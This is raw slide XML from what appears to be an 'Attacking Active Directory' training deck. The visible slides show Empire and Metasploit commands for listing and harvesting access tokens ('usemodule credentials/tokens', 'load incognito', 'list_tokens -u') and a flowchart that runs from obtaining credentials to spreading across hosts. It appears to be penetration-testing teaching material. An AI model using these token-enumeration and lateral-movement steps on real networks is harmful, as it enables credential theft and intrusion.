                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Token List - Empire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="5703838"/>
            <a:ext cx="7858125" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Empire:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usemodule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>credentials/tokens</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D67D885-6EE3-486E-A8BC-4D8BE348138A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1535764" y="1583567"/>
            <a:ext cx="9351311" cy="4130478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="255927662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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Token List - Empire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8A8EF1E-E02A-4DF7-9BB1-0AA61884B7A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="226503" y="1420407"/>
            <a:ext cx="10476190" cy="5342857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416606493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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Token List - Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="82858" y="1429011"/>
            <a:ext cx="3929062" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;load incognito</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>list_tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -u</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5DC7792-2B07-4223-ACB0-4B23013A5DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4011919" y="1486647"/>
            <a:ext cx="7974136" cy="5371353"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143669918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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D85D8DC3-141C-476E-9080-BC8F5314DA37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1326570" y="1249112"/>
            <a:ext cx="9538857" cy="5290570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3697227-C62C-4B72-A875-8B6ADFC68F4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="1400689"/>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ACL’s  DACL’s  SACL’s and  ACE’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SO’s and SD’s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26431050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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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Basic Theory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4689A3FD-A05A-441D-9ED4-6CA64C2C167C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190368" y="3452047"/>
            <a:ext cx="1568685" cy="1107947"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1201625"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 815868"/>
              <a:gd name="connsiteX1" fmla="*/ 1201625 w 1201625"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 815868"/>
              <a:gd name="connsiteX2" fmla="*/ 1201625 w 1201625"/>
              <a:gd name="connsiteY2" fmla="*/ 815868 h 815868"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1201625"/>
              <a:gd name="connsiteY3" fmla="*/ 815868 h 815868"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1201625"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 815868"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1201625"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 815868"/>
              <a:gd name="connsiteX1" fmla="*/ 1201625 w 1201625"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 815868"/>
              <a:gd name="connsiteX2" fmla="*/ 1190084 w 1201625"/>
              <a:gd name="connsiteY2" fmla="*/ 406674 h 815868"/>
              <a:gd name="connsiteX3" fmla="*/ 1201625 w 1201625"/>
              <a:gd name="connsiteY3" fmla="*/ 815868 h 815868"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1201625"/>
              <a:gd name="connsiteY4" fmla="*/ 815868 h 815868"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 1201625"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 815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1625" h="815868">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1201625" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1190084" y="406674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201625" y="815868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="815868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="25400" dir="5400000" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="4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Start</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C093262-8E80-4982-99CA-FD95821AB875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5413189" y="1991965"/>
            <a:ext cx="1365621" cy="87172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Win!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDED07DE-35AC-43CF-AD8D-91AE67D544BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7889783" y="3460990"/>
            <a:ext cx="1604701" cy="1069606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="635000">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="38100" dist="25400" dir="5400000" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="4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Identify Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Spread)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Flowchart: Decision 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C17C7D9-E648-44B8-AF1A-4B5E453B299C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5195701" y="3381316"/>
            <a:ext cx="1803163" cy="1198112"/>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High Privilege User?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{263DCC4F-22B3-4007-B988-F96B78D43E53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10185474" y="3460990"/>
            <a:ext cx="1604701" cy="107595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Migrate to New Host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EF98EE0-EB49-48CF-846C-567C41BA793B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="2"/>
            <a:endCxn id="84" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1743987" y="3994497"/>
            <a:ext cx="905987" cy="98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FC9438E6-315E-45B9-979F-9CAF3510E3A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="0"/>
            <a:endCxn id="10" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6096000" y="2863689"/>
            <a:ext cx="1283" cy="5176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6C47817F-627B-4EEA-8CEB-24EA27149345}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5564472" y="3038191"/>
            <a:ext cx="531526" cy="316140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Yes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67F93868-6489-4B4E-9B1C-914B737078B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="3"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6998864" y="3980372"/>
            <a:ext cx="890919" cy="154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97DF254D-ABC3-4773-B135-877005309EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="3"/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9494484" y="3995793"/>
            <a:ext cx="690990" cy="31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Connector: Curved 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCDD4850-2A2A-42EC-B80C-16DA71A6BAFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="2"/>
            <a:endCxn id="84" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7221077" y="793246"/>
            <a:ext cx="23048" cy="7510448"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7135595"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Rectangle 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E41E15A-DBA4-427B-825B-465AA9D01BD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2649974" y="3428999"/>
            <a:ext cx="1654806" cy="113099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Obtain Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="104" name="Straight Arrow Connector 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA163EE3-1170-49B5-B3F3-C36908B82FDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="84" idx="3"/>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4304780" y="3980372"/>
            <a:ext cx="890921" cy="141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5" name="TextBox 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF926511-1CBB-43AD-A9F1-0C159829E5F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7173785" y="3708400"/>
            <a:ext cx="585906" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
